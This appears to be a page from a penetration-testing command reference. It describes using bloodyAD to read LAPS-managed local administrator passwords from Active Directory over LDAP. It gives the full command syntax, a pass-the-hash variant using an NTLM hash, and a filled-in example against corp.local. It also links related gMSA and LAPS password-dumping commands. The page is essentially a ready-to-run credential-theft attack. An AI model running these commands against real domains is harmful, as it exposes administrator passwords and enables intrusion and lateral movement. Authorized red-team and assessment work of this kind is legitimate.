BloodyAD LAPS Password Read
Read LAPS passwords from Active Directory using BloodyAD
- Tool
- bloodyAD
- Category
- Credential Attacks / gMSA & LAPS
- Platform
- linux
- Requires
- password
- Protocols
- LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
bloodyAD --host '<ip>' -d '<domain>' -u '<user>' -p '<password>' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
bloodyAD --host '<ip>' -d '<domain>' -u '<user>' --hashes ':<hash>' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Examples
bloodyAD --host '192.168.1.2' -d 'corp.local' -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Tags
Related commands
- gMSA Password Dump Read password of Group Managed Service Account
- Impacket GetLAPSPassword Retrieve LAPS managed local administrator passwords from Active Directory
- NetExec LAPS Module (Read ms-MCS-AdmPwd) Read LAPS-managed local admin passwords from ms-MCS-AdmPwd / msLAPS-Password attributes…
- NetExec LDAP gMSA Dump Read Group Managed Service Account passwords via NetExec
- NetExec LDAP LAPS Retrieve LAPS managed local administrator passwords from Active Directory via LDAP